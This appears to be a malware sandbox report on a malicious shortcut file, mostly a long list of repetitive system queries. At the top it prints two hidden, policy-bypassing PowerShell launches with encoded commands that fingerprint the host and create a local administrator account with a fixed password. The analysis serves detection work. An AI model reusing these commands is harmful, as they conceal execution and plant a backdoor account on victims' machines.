      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=

      Language, Device and Operating System Detection

      barindex
      Yara detected Obfuscated Powershell
      Source: Yara matchFile source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk, type: SAMPLE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
